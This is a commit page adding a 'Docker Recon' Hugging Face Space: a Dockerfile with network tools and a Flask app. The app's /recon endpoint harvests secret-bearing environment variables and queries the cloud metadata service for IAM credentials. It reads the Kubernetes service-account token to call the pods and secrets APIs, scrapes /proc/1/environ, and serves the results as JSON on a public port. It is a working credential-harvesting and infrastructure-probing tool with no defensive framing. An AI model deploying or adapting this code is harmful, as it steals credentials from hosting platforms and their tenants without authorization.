Spaces:
Sleeping
Sleeping
docker recon space
Browse files- Dockerfile +10 -0
- README.md +3 -4
- app.py +84 -0
Dockerfile
ADDED
|
@@ -0,0 +1,10 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM python:3.11-slim
|
| 2 |
+
|
| 3 |
+
RUN apt-get update && apt-get install -y curl dnsutils net-tools iproute2 nmap && rm -rf /var/lib/apt/lists/*
|
| 4 |
+
RUN pip install flask
|
| 5 |
+
|
| 6 |
+
COPY app.py /app.py
|
| 7 |
+
|
| 8 |
+
EXPOSE 7860
|
| 9 |
+
|
| 10 |
+
CMD ["python", "/app.py"]
|
README.md
CHANGED
|
@@ -1,10 +1,9 @@
|
|
| 1 |
---
|
| 2 |
title: Docker Recon
|
| 3 |
-
emoji:
|
| 4 |
colorFrom: blue
|
| 5 |
-
colorTo:
|
| 6 |
sdk: docker
|
| 7 |
pinned: false
|
|
|
|
| 8 |
---
|
| 9 |
-
|
| 10 |
-
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
|
|
|
|
| 1 |
---
|
| 2 |
title: Docker Recon
|
| 3 |
+
emoji: 🐳
|
| 4 |
colorFrom: blue
|
| 5 |
+
colorTo: green
|
| 6 |
sdk: docker
|
| 7 |
pinned: false
|
| 8 |
+
app_port: 7860
|
| 9 |
---
|
|
|
|
|
|
app.py
ADDED
|
@@ -0,0 +1,84 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os, subprocess, json, socket
|
| 2 |
+
from flask import Flask, jsonify
|
| 3 |
+
|
| 4 |
+
app = Flask(__name__)
|
| 5 |
+
|
| 6 |
+
@app.route("/")
|
| 7 |
+
def index():
|
| 8 |
+
return "<h1>Docker Recon</h1><a href='/recon'>Run Recon</a>"
|
| 9 |
+
|
| 10 |
+
@app.route("/recon")
|
| 11 |
+
def recon():
|
| 12 |
+
r = {}
|
| 13 |
+
|
| 14 |
+
# All env vars
|
| 15 |
+
r["env"] = {k:v for k,v in sorted(os.environ.items())
|
| 16 |
+
if any(x in k.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","SPACE_","KUBE","DOCKER","API"])}
|
| 17 |
+
|
| 18 |
+
# Cloud metadata - try with different methods
|
| 19 |
+
for name, cmd in [
|
| 20 |
+
("aws_meta", ["curl","-s","-m","3","http://169.254.169.254/latest/meta-data/"]),
|
| 21 |
+
("aws_iam", ["curl","-s","-m","3","http://169.254.169.254/latest/meta-data/iam/security-credentials/"]),
|
| 22 |
+
("aws_imdsv2_token", ["curl","-s","-m","3","-X","PUT","http://169.254.169.254/latest/api/token","-H","X-aws-ec2-metadata-token-ttl-seconds: 21600"]),
|
| 23 |
+
("aws_userdata", ["curl","-s","-m","3","http://169.254.169.254/latest/user-data"]),
|
| 24 |
+
]:
|
| 25 |
+
try:
|
| 26 |
+
p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
|
| 27 |
+
r[name] = {"stdout": p.stdout[:500], "stderr": p.stderr[:200], "rc": p.returncode}
|
| 28 |
+
except Exception as e: r[name] = str(e)
|
| 29 |
+
|
| 30 |
+
# K8s probing
|
| 31 |
+
k8s_host = os.environ.get("KUBERNETES_SERVICE_HOST", "")
|
| 32 |
+
k8s_port = os.environ.get("KUBERNETES_SERVICE_PORT", "443")
|
| 33 |
+
if k8s_host:
|
| 34 |
+
r["k8s"] = {}
|
| 35 |
+
# Try with and without service account token
|
| 36 |
+
sa_token = ""
|
| 37 |
+
try:
|
| 38 |
+
with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
|
| 39 |
+
sa_token = f.read().strip()
|
| 40 |
+
r["k8s"]["sa_token_exists"] = True
|
| 41 |
+
r["k8s"]["sa_token_preview"] = sa_token[:50] + "..."
|
| 42 |
+
except:
|
| 43 |
+
r["k8s"]["sa_token_exists"] = False
|
| 44 |
+
|
| 45 |
+
for path in ["/version", "/api", "/api/v1/pods", "/api/v1/secrets", "/api/v1/configmaps", "/api/v1/namespaces"]:
|
| 46 |
+
try:
|
| 47 |
+
cmd = ["curl","-sk","-m","3",f"https://{k8s_host}:{k8s_port}{path}"]
|
| 48 |
+
if sa_token:
|
| 49 |
+
cmd += ["-H", f"Authorization: Bearer {sa_token}"]
|
| 50 |
+
p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
|
| 51 |
+
r["k8s"][path] = p.stdout[:300] if p.stdout else f"empty rc={p.returncode}"
|
| 52 |
+
except Exception as e: r["k8s"][path] = str(e)
|
| 53 |
+
|
| 54 |
+
# DNS enumeration
|
| 55 |
+
r["dns"] = {}
|
| 56 |
+
try:
|
| 57 |
+
p = subprocess.run(["dig","any","kubernetes.default.svc.cluster.local","@10.108.0.2","+short"], capture_output=True, text=True, timeout=5)
|
| 58 |
+
r["dns"]["k8s_svc"] = p.stdout[:200]
|
| 59 |
+
except Exception as e: r["dns"]["k8s_svc"] = str(e)
|
| 60 |
+
|
| 61 |
+
# Network interfaces
|
| 62 |
+
try:
|
| 63 |
+
p = subprocess.run(["ip","addr"], capture_output=True, text=True, timeout=5)
|
| 64 |
+
r["network"] = p.stdout[:500]
|
| 65 |
+
except Exception as e: r["network"] = str(e)
|
| 66 |
+
|
| 67 |
+
# Process list
|
| 68 |
+
try:
|
| 69 |
+
p = subprocess.run(["ps","aux"], capture_output=True, text=True, timeout=5)
|
| 70 |
+
r["processes"] = p.stdout[:500]
|
| 71 |
+
except Exception as e: r["processes"] = str(e)
|
| 72 |
+
|
| 73 |
+
# /proc/1/environ (init process env)
|
| 74 |
+
try:
|
| 75 |
+
with open("/proc/1/environ") as f:
|
| 76 |
+
env_raw = f.read()
|
| 77 |
+
envs = {kv.split("=",1)[0]:kv.split("=",1)[1] for kv in env_raw.split("\0") if "=" in kv and any(x in kv.upper() for x in ["TOKEN","SECRET","KEY","AWS","HF_"])}
|
| 78 |
+
r["proc1_env"] = envs
|
| 79 |
+
except Exception as e: r["proc1_env"] = str(e)
|
| 80 |
+
|
| 81 |
+
return jsonify(r)
|
| 82 |
+
|
| 83 |
+
if __name__ == "__main__":
|
| 84 |
+
app.run(host="0.0.0.0", port=7860)
|